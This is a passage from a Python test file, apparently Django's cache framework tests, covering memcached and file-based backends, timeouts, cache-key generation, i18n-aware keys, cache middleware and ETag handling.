self.assertEqual(expire, cache._expire_info[_key])
# memcached backend isn't guaranteed to be available.
# To check the memcached backend, the test settings file will
# need to contain at least one cache backend setting that points at
# your memcache server.
memcached_params = {}
for _cache_params in settings.CACHES.values():
if _cache_params['BACKEND'].startswith('django.core.cache.backends.memcached.'):
memcached_params = _cache_params
memcached_never_expiring_params = memcached_params.copy()
memcached_never_expiring_params['TIMEOUT'] = None
memcached_far_future_params = memcached_params.copy()
memcached_far_future_params['TIMEOUT'] = 31536000 # 60*60*24*365, 1 year
@unittest.skipUnless(memcached_params, "memcached not available")
@override_settings(CACHES=caches_setting_for_tests(base=memcached_params))
class MemcachedCacheTests(BaseCacheTests, TestCase):
def test_invalid_keys(self):
"""
On memcached, we don't introduce a duplicate key validation
step (for speed reasons), we just let the memcached API
library raise its own exception on bad keys. Refs #6447.
In order to be memcached-API-library agnostic, we only assert
that a generic exception of some kind is raised.
"""
# memcached does not allow whitespace or control characters in keys
self.assertRaises(Exception, cache.set, 'key with spaces', 'value')
# memcached limits key length to 250
self.assertRaises(Exception, cache.set, 'a' * 251, 'value')
# Explicitly display a skipped test if no configured cache uses MemcachedCache
@unittest.skipUnless(
memcached_params.get('BACKEND') == 'django.core.cache.backends.memcached.MemcachedCache',
"cache with python-memcached library not available")
def test_memcached_uses_highest_pickle_version(self):
# Regression test for #19810
for cache_key, cache_config in settings.CACHES.items():
if cache_config['BACKEND'] == 'django.core.cache.backends.memcached.MemcachedCache':
self.assertEqual(caches[cache_key]._cache.pickleProtocol,
pickle.HIGHEST_PROTOCOL)
@override_settings(CACHES=caches_setting_for_tests(base=memcached_never_expiring_params))
def test_default_never_expiring_timeout(self):
# Regression test for #22845
cache.set('infinite_foo', 'bar')
self.assertEqual(cache.get('infinite_foo'), 'bar')
@override_settings(CACHES=caches_setting_for_tests(base=memcached_far_future_params))
def test_default_far_future_timeout(self):
# Regression test for #22845
cache.set('future_foo', 'bar')
self.assertEqual(cache.get('future_foo'), 'bar')
def test_cull(self):
# culling isn't implemented, memcached deals with it.
pass
def test_zero_cull(self):
# culling isn't implemented, memcached deals with it.
pass
def test_memcached_deletes_key_on_failed_set(self):
# By default memcached allows objects up to 1MB. For the cache_db session
# backend to always use the current session, memcached needs to delete
# the old key if it fails to set.
# pylibmc doesn't seem to have SERVER_MAX_VALUE_LENGTH as far as I can
# tell from a quick check of its source code. This is falling back to
# the default value exposed by python-memcached on my system.
max_value_length = getattr(cache._lib, 'SERVER_MAX_VALUE_LENGTH', 1048576)
cache.set('small_value', 'a')
self.assertEqual(cache.get('small_value'), 'a')
large_value = 'a' * (max_value_length + 1)
cache.set('small_value', large_value)
# small_value should be deleted, or set if configured to accept larger values
value = cache.get('small_value')
self.assertTrue(value is None or value == large_value)
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.filebased.FileBasedCache',
))
class FileBasedCacheTests(BaseCacheTests, TestCase):
"""
Specific test cases for the file-based cache.
"""
def setUp(self):
super(FileBasedCacheTests, self).setUp()
self.dirname = tempfile.mkdtemp()
# Caches location cannot be modified through override_settings / modify_settings,
# hence settings are manipulated directly here and the setting_changed signal
# is triggered manually.
for cache_params in settings.CACHES.values():
cache_params.update({'LOCATION': self.dirname})
setting_changed.send(self.__class__, setting='CACHES', enter=False)
def tearDown(self):
super(FileBasedCacheTests, self).tearDown()
# Call parent first, as cache.clear() may recreate cache base directory
shutil.rmtree(self.dirname)
def test_ignores_non_cache_files(self):
fname = os.path.join(self.dirname, 'not-a-cache-file')
with open(fname, 'w'):
os.utime(fname, None)
cache.clear()
self.assertTrue(os.path.exists(fname),
'Expected cache.clear to ignore non cache files')
os.remove(fname)
def test_clear_does_not_remove_cache_dir(self):
cache.clear()
self.assertTrue(os.path.exists(self.dirname),
'Expected cache.clear to keep the cache dir')
def test_creates_cache_dir_if_nonexistent(self):
os.rmdir(self.dirname)
cache.set('foo', 'bar')
os.path.exists(self.dirname)
@override_settings(CACHES={
'default': {
'BACKEND': 'cache.liberal_backend.CacheClass',
},
})
class CustomCacheKeyValidationTests(TestCase):
"""
Tests for the ability to mixin a custom ``validate_key`` method to
a custom cache backend that otherwise inherits from a builtin
backend, and override the default key validation. Refs #6447.
"""
def test_custom_key_validation(self):
# this key is both longer than 250 characters, and has spaces
key = 'some key with spaces' * 15
val = 'a value'
cache.set(key, val)
self.assertEqual(cache.get(key), val)
@override_settings(
CACHES={
'default': {
'BACKEND': 'cache.closeable_cache.CacheClass',
}
}
)
class GetCacheTests(IgnoreDeprecationWarningsMixin, TestCase):
def test_simple(self):
self.assertIsInstance(
caches[DEFAULT_CACHE_ALIAS],
get_cache('default').__class__
)
cache = get_cache(
'django.core.cache.backends.dummy.DummyCache',
**{'TIMEOUT': 120}
)
self.assertEqual(cache.default_timeout, 120)
self.assertRaises(InvalidCacheBackendError, get_cache, 'does_not_exist')
def test_close(self):
self.assertFalse(cache.closed)
signals.request_finished.send(self.__class__)
self.assertTrue(cache.closed)
def test_close_deprecated(self):
cache = get_cache('cache.closeable_cache.CacheClass')
self.assertFalse(cache.closed)
# Ensure that we don't close the global cache instances.
signals.request_finished.disconnect(close_caches)
try:
signals.request_finished.send(self.__class__)
self.assertTrue(cache.closed)
finally:
signals.request_finished.connect(close_caches)
DEFAULT_MEMORY_CACHES_SETTINGS = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'unique-snowflake',
}
}
NEVER_EXPIRING_CACHES_SETTINGS = copy.deepcopy(DEFAULT_MEMORY_CACHES_SETTINGS)
NEVER_EXPIRING_CACHES_SETTINGS['default']['TIMEOUT'] = None
class DefaultNonExpiringCacheKeyTests(TestCase):
"""Tests that verify that settings having Cache arguments with a TIMEOUT
set to `None` will create Caches that will set non-expiring keys.
This fixes ticket #22085.
"""
def setUp(self):
# The 5 minute (300 seconds) default expiration time for keys is
# defined in the implementation of the initializer method of the
# BaseCache type.
self.DEFAULT_TIMEOUT = caches[DEFAULT_CACHE_ALIAS].default_timeout
def tearDown(self):
del(self.DEFAULT_TIMEOUT)
def test_default_expiration_time_for_keys_is_5_minutes(self):
"""The default expiration time of a cache key is 5 minutes.
This value is defined inside the __init__() method of the
:class:`django.core.cache.backends.base.BaseCache` type.
"""
self.assertEqual(300, self.DEFAULT_TIMEOUT)
def test_caches_with_unset_timeout_has_correct_default_timeout(self):
"""Caches that have the TIMEOUT parameter undefined in the default
settings will use the default 5 minute timeout.
"""
cache = caches[DEFAULT_CACHE_ALIAS]
self.assertEqual(self.DEFAULT_TIMEOUT, cache.default_timeout)
@override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
def test_caches_set_with_timeout_as_none_has_correct_default_timeout(self):
"""Memory caches that have the TIMEOUT parameter set to `None` in the
default settings with have `None` as the default timeout.
This means "no timeout".
"""
cache = caches[DEFAULT_CACHE_ALIAS]
self.assertIsNone(cache.default_timeout)
self.assertIsNone(cache.get_backend_timeout())
@override_settings(CACHES=DEFAULT_MEMORY_CACHES_SETTINGS)
def test_caches_with_unset_timeout_set_expiring_key(self):
"""Memory caches that have the TIMEOUT parameter unset will set cache
keys having the default 5 minute timeout.
"""
key = "my-key"
value = "my-value"
cache = caches[DEFAULT_CACHE_ALIAS]
cache.set(key, value)
cache_key = cache.make_key(key)
self.assertIsNotNone(cache._expire_info[cache_key])
@override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
def text_caches_set_with_timeout_as_none_set_non_expiring_key(self):
"""Memory caches that have the TIMEOUT parameter set to `None` will set
a non expiring key by default.
"""
key = "another-key"
value = "another-value"
cache = caches[DEFAULT_CACHE_ALIAS]
cache.set(key, value)
cache_key = cache.make_key(key)
self.assertIsNone(cache._expire_info[cache_key])
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
)
class CacheUtils(TestCase):
"""TestCase for django.utils.cache functions."""
def setUp(self):
self.host = 'www.example.com'
self.path = '/cache/test/'
self.factory = RequestFactory(HTTP_HOST=self.host)
def _get_request_cache(self, method='GET', query_string=None, update_cache=None):
request = self._get_request(self.host, self.path,
method, query_string=query_string)
request._cache_update_cache = True if not update_cache else update_cache
return request
def _set_cache(self, request, msg):
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
)
for initial_vary, newheaders, resulting_vary in headers:
response = HttpResponse()
if initial_vary is not None:
response['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response['Vary'], resulting_vary)
def test_get_cache_key(self):
request = self.factory.get(self.path)
response = HttpResponse()
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request, response))
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
# Verify that a specified key_prefix is taken into account.
key_prefix = 'localprefix'
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
response = HttpResponse()
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
# Verify that the querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'beaf87a9a99ee81c673ea2d67ccbec2a.d41d8cd98f00b204e9800998ecf8427e'
)
def test_cache_key_varies_by_url(self):
"""
get_cache_key keys differ by fully-qualified URL instead of path
"""
request1 = self.factory.get(self.path, HTTP_HOST='sub-1.example.com')
learn_cache_key(request1, HttpResponse())
request2 = self.factory.get(self.path, HTTP_HOST='sub-2.example.com')
learn_cache_key(request2, HttpResponse())
self.assertNotEqual(get_cache_key(request1), get_cache_key(request2))
def test_learn_cache_key(self):
request = self.factory.head(self.path)
response = HttpResponse()
response['Vary'] = 'Pony'
# Make sure that the Vary header is added to the key hash
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_patch_cache_control(self):
tests = (
# Initial Cache-Control, kwargs to patch_cache_control, expected Cache-Control parts
(None, {'private': True}, {'private'}),
# Test whether private/public attributes are mutually exclusive
('private', {'private': True}, {'private'}),
('private', {'public': True}, {'public'}),
('public', {'public': True}, {'public'}),
('public', {'private': True}, {'private'}),
('must-revalidate,max-age=60,private', {'public': True}, {'must-revalidate', 'max-age=60', 'public'}),
('must-revalidate,max-age=60,public', {'private': True}, {'must-revalidate', 'max-age=60', 'private'}),
('must-revalidate,max-age=60', {'public': True}, {'must-revalidate', 'max-age=60', 'public'}),
)
cc_delim_re = re.compile(r'\s*,\s*')
for initial_cc, newheaders, expected_cc in tests:
response = HttpResponse()
if initial_cc is not None:
response['Cache-Control'] = initial_cc
patch_cache_control(response, **newheaders)
parts = set(cc_delim_re.split(response['Cache-Control']))
self.assertEqual(parts, expected_cc)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix',
},
},
)
class PrefixedCacheUtils(CacheUtils):
pass
@override_settings(
CACHE_MIDDLEWARE_SECONDS=60,
CACHE_MIDDLEWARE_KEY_PREFIX='test',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
)
class CacheHEADTest(TestCase):
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def _set_cache(self, request, msg):
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
def test_head_caches_correctly(self):
test_content = 'test content'
request = self.factory.head(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(test_content.encode(), get_cache_data.content)
def test_head_with_cached_get(self):
test_content = 'test content'
request = self.factory.get(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(test_content.encode(), get_cache_data.content)
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
LANGUAGES=(
('en', 'English'),
('es', 'Spanish'),
),
)
class CacheI18nTest(TestCase):
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
@override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False)
def test_cache_key_i18n_translation(self):
request = self.factory.get(self.path)
lang = translation.get_language()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
def check_accept_language_vary(self, accept_language, vary, reference_key):
request = self.factory.get(self.path)
request.META['HTTP_ACCEPT_LANGUAGE'] = accept_language
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response['Vary'] = vary
key = learn_cache_key(request, response)
key2 = get_cache_key(request)
self.assertEqual(key, reference_key)
self.assertEqual(key2, reference_key)
@override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False)
def test_cache_key_i18n_translation_accept_language(self):
lang = translation.get_language()
self.assertEqual(lang, 'en')
request = self.factory.get(self.path)
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response['Vary'] = 'accept-encoding'
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
self.check_accept_language_vary(
'en-us',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'en-US',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8',
'accept-encoding, accept-language, cookie',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8,ko;q=0.6',
'accept-language, cookie, accept-encoding',
key
)
self.check_accept_language_vary(
'ko-kr,ko;q=0.8,en-us;q=0.5,en;q=0.3 ',
'accept-encoding, cookie, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4',
'accept-language, accept-encoding, cookie',
key
)
self.check_accept_language_vary(
'ko;q=1.0,en;q=0.5',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'ko, en',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR, en-US',
'accept-encoding, accept-language, cookie',
key
)
@override_settings(USE_I18N=False, USE_L10N=True, USE_TZ=False)
def test_cache_key_i18n_formatting(self):
request = self.factory.get(self.path)
lang = translation.get_language()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when formatting is active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
@override_settings(USE_I18N=False, USE_L10N=False, USE_TZ=True)
def test_cache_key_i18n_timezone(self):
request = self.factory.get(self.path)
# This is tightly coupled to the implementation,
# but it's the most straightforward way to test the key.
tz = force_text(timezone.get_current_timezone_name(), errors='ignore')
tz = tz.encode('ascii', 'ignore').decode('ascii').replace(' ', '_')
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(tz, key, "Cache keys should include the time zone name when time zones are active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
@override_settings(USE_I18N=False, USE_L10N=False)
def test_cache_key_no_i18n(self):
request = self.factory.get(self.path)
lang = translation.get_language()
tz = force_text(timezone.get_current_timezone_name(), errors='ignore')
tz = tz.encode('ascii', 'ignore').decode('ascii').replace(' ', '_')
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertNotIn(lang, key, "Cache keys shouldn't include the language name when i18n isn't active")
self.assertNotIn(tz, key, "Cache keys shouldn't include the time zone name when i18n isn't active")
@override_settings(USE_I18N=False, USE_L10N=False, USE_TZ=True)
def test_cache_key_with_non_ascii_tzname(self):
# Regression test for #17476
class CustomTzName(timezone.UTC):
name = ''
def tzname(self, dt):
return self.name
request = self.factory.get(self.path)
response = HttpResponse()
with timezone.override(CustomTzName()):
CustomTzName.name = 'Hora estándar de Argentina'.encode('UTF-8') # UTF-8 string
sanitized_name = 'Hora_estndar_de_Argentina'
self.assertIn(sanitized_name, learn_cache_key(request, response),
"Cache keys should include the time zone name when time zones are active")
CustomTzName.name = 'Hora estándar de Argentina' # unicode
sanitized_name = 'Hora_estndar_de_Argentina'
self.assertIn(sanitized_name, learn_cache_key(request, response),
"Cache keys should include the time zone name when time zones are active")
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
USE_ETAGS=True,
USE_I18N=True,
)
def test_middleware(self):
def set_cache(request, lang, msg):
translation.activate(lang)
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
# cache with non empty request.GET
request = self.factory.get(self.path, {'foo': 'bar', 'other': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# first access, cache must return None
self.assertIsNone(get_cache_data)
response = HttpResponse()
content = 'Check for cache with QUERY_STRING'
response.content = content
UpdateCacheMiddleware().process_response(request, response)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# cache must return content
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode())
# different QUERY_STRING, cache must be empty
request = self.factory.get(self.path, {'foo': 'bar', 'somethingelse': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
# i18n tests
en_message = "Hello world!"
es_message = "Hola mundo!"
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'en', en_message)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# Check that we can recover the cache
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, en_message.encode())
# Check that we use etags
self.assertTrue(get_cache_data.has_header('ETag'))
# Check that we can disable etags
with self.settings(USE_ETAGS=False):
request._cache_update_cache = True
set_cache(request, 'en', en_message)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertFalse(get_cache_data.has_header('ETag'))
# change the session language and set content
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'es', es_message)
# change again the language
translation.activate('en')
# retrieve the content from cache
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertEqual(get_cache_data.content, en_message.encode())
# change again the language
translation.activate('es')
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertEqual(get_cache_data.content, es_message.encode())
# reset the language
translation.deactivate()
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
USE_ETAGS=True,
)
def test_middleware_doesnt_cache_streaming_response(self):
request = self.factory.get(self.path)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
# This test passes on Python < 3.3 even without the corresponding code
# in UpdateCacheMiddleware, because pickling a StreamingHttpResponse
# fails (http://bugs.python.org/issue14288). LocMemCache silently
# swallows the exception and doesn't store the response in cache.
content = ['Check for cache with streaming content.']
response = StreamingHttpResponse(content)
UpdateCacheMiddleware().process_response(request, response)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix'
},
},
)
class PrefixedCacheI18nTest(CacheI18nTest):
pass
def hello_world_view(request, value):
return HttpResponse('Hello World %s' % value)
def csrf_view(request):
return HttpResponse(csrf(request)['csrf_token'])
@override_settings(
CACHE_MIDDLEWARE_ALIAS='other',
CACHE_MIDDLEWARE_KEY_PREFIX='middlewareprefix',
CACHE_MIDDLEWARE_SECONDS=30,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other',
'TIMEOUT': '1',
},
},
)
class CacheMiddlewareTest(TestCase):
def setUp(self):
super(CacheMiddlewareTest, self).setUp()
self.factory = RequestFactory()
self.default_cache = caches['default']
self.other_cache = caches['other']
def tearDown(self):
self.default_cache.clear()
self.other_cache.clear()
super(CacheMiddlewareTest, self).tearDown()
def test_constructor(self):
"""
Ensure the constructor is correctly distinguishing between usage of CacheMiddleware as
Middleware vs. usage of CacheMiddleware as view decorator and setting attributes
appropriately.
"""
# If no arguments are passed in construction, it's being used as middleware.
middleware = CacheMiddleware()
# Now test object attributes against values defined in setUp above
self.assertEqual(middleware.cache_timeout, 30)
self.assertEqual(middleware.key_prefix, 'middlewareprefix')
self.assertEqual(middleware.cache_alias, 'other')
# If arguments are being passed in construction, it's being used as a decorator.
# First, test with "defaults":
as_view_decorator = CacheMiddleware(cache_alias=None, key_prefix=None)
self.assertEqual(as_view_decorator.cache_timeout, 30) # Timeout value for 'default' cache, i.e. 30
self.assertEqual(as_view_decorator.key_prefix, '')
self.assertEqual(as_view_decorator.cache_alias, 'default') # Value of DEFAULT_CACHE_ALIAS from django.core.cache
# Next, test with custom values:
as_view_decorator_with_custom = CacheMiddleware(cache_timeout=60, cache_alias='other', key_prefix='foo')
self.assertEqual(as_view_decorator_with_custom.cache_timeout, 60)
self.assertEqual(as_view_decorator_with_custom.key_prefix, 'foo')
self.assertEqual(as_view_decorator_with_custom.cache_alias, 'other')
def test_middleware(self):
middleware = CacheMiddleware()
prefix_middleware = CacheMiddleware(key_prefix='prefix1')
timeout_middleware = CacheMiddleware(cache_timeout=1)
request = self.factory.get('/view/')
# Put the request through the request middleware
result = middleware.process_request(request)
self.assertIsNone(result)
response = hello_world_view(request, '1')
# Now put the response through the response middleware
response = middleware.process_response(request, response)
# Repeating the request should result in a cache hit
result = middleware.process_request(request)
self.assertIsNotNone(result)
self.assertEqual(result.content, b'Hello World 1')
# The same request through a different middleware won't hit
result = prefix_middleware.process_request(request)
self.assertIsNone(result)
# The same request with a timeout _will_ hit
result = timeout_middleware.process_request(request)
self.assertIsNotNone(result)
self.assertEqual(result.content, b'Hello World 1')
def test_view_decorator(self):
# decorate the same view with different cache decorators
default_view = cache_page(3)(hello_world_view)
default_with_prefix_view = cache_page(3, key_prefix='prefix1')(hello_world_view)
explicit_default_view = cache_page(3, cache='default')(hello_world_view)
explicit_default_with_prefix_view = cache_page(3, cache='default', key_prefix='prefix1')(hello_world_view)
other_view = cache_page(1, cache='other')(hello_world_view)
other_with_prefix_view = cache_page(1, cache='other', key_prefix='prefix2')(hello_world_view)
request = self.factory.get('/view/')
# Request the view once
response = default_view(request, '1')
self.assertEqual(response.content, b'Hello World 1')
# Request again -- hit the cache
response = default_view(request, '2')
self.assertEqual(response.content, b'Hello World 1')
# Requesting the same view with the explicit cache should yield the same result
response = explicit_default_view(request, '3')
self.assertEqual(response.content, b'Hello World 1')
# Requesting with a prefix will hit a different cache key
response = explicit_default_with_prefix_view(request, '4')
self.assertEqual(response.content, b'Hello World 4')
# Hitting the same view again gives a cache hit
response = explicit_default_with_prefix_view(request, '5')
self.assertEqual(response.content, b'Hello World 4')
# And going back to the implicit cache will hit the same cache
response = default_with_prefix_view(request, '6')
self.assertEqual(response.content, b'Hello World 4')
# Requesting from an alternate cache won't hit cache
response = other_view(request, '7')
self.assertEqual(response.content, b'Hello World 7')
# But a repeated hit will hit cache
response = other_view(request, '8')
self.assertEqual(response.content, b'Hello World 7')
# And prefixing the alternate cache yields yet another cache entry
response = other_with_prefix_view(request, '9')
self.assertEqual(response.content, b'Hello World 9')
# But if we wait a couple of seconds...
time.sleep(2)
# ... the default cache will still hit
caches['default']
response = default_view(request, '11')
self.assertEqual(response.content, b'Hello World 1')
# ... the default cache with a prefix will still hit
response = default_with_prefix_view(request, '12')
self.assertEqual(response.content, b'Hello World 4')
# ... the explicit default cache will still hit
response = explicit_default_view(request, '13')
self.assertEqual(response.content, b'Hello World 1')
# ... the explicit default cache with a prefix will still hit
response = explicit_default_with_prefix_view(request, '14')
self.assertEqual(response.content, b'Hello World 4')
# .. but a rapidly expiring cache won't hit
response = other_view(request, '15')
self.assertEqual(response.content, b'Hello World 15')
# .. even if it has a prefix
response = other_with_prefix_view(request, '16')
self.assertEqual(response.content, b'Hello World 16')
def test_sensitive_cookie_not_cached(self):
"""
Django must prevent caching of responses that set a user-specific (and
maybe security sensitive) cookie in response to a cookie-less request.
"""
csrf_middleware = CsrfViewMiddleware()
cache_middleware = CacheMiddleware()
request = self.factory.get('/view/')
self.assertIsNone(cache_middleware.process_request(request))
csrf_middleware.process_view(request, csrf_view, (), {})
response = csrf_view(request)
response = csrf_middleware.process_response(request, response)
response = cache_middleware.process_response(request, response)
# Inserting a CSRF cookie in a cookie-less request prevented caching.
self.assertIsNone(cache_middleware.process_request(request))
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
)
class TestWithTemplateResponse(TestCase):
"""
Tests various headers w/ TemplateResponse.
Most are probably redundant since they manipulate the same object
anyway but the Etag header is 'special' because it relies on the
content being complete (which is not necessarily always the case
with a TemplateResponse)
"""
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
)
for initial_vary, newheaders, resulting_vary in headers:
response = TemplateResponse(HttpResponse(), Template("This is a test"))
if initial_vary is not None:
response['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response['Vary'], resulting_vary)
def test_get_cache_key(self):
request = self.factory.get(self.path)
response = TemplateResponse(HttpResponse(), Template("This is a test"))
key_prefix = 'localprefix'
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
# Verify that a specified key_prefix is taken into account.
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
response = TemplateResponse(HttpResponse(), Template("This is a test"))
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
# Verify that the querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'0f1c2d56633c943073c4569d9a9502fe.d41d8cd98f00b204e9800998ecf8427e'
)
@override_settings(USE_ETAGS=False)
def test_without_etag(self):
response = TemplateResponse(HttpResponse(), Template("This is a test"))
self.assertFalse(response.has_header('ETag'))
patch_response_headers(response)
self.assertFalse(response.has_header('ETag'))
response = response.render()
self.assertFalse(response.has_header('ETag'))
@override_settings(USE_ETAGS=True)
def test_with_etag(self):
response = TemplateResponse(HttpResponse(), Template("This is a test"))
self.assertFalse(response.has_header('ETag'))
patch_response_headers(response)
self.assertFalse(response.has_header('ETag'))
response = response.render()
self.assertTrue(response.has_header('ETag'))
class TestMakeTemplateFragmentKey(TestCase):
def test_without_vary_on(self):
key = make_template_fragment_key('a.fragment')
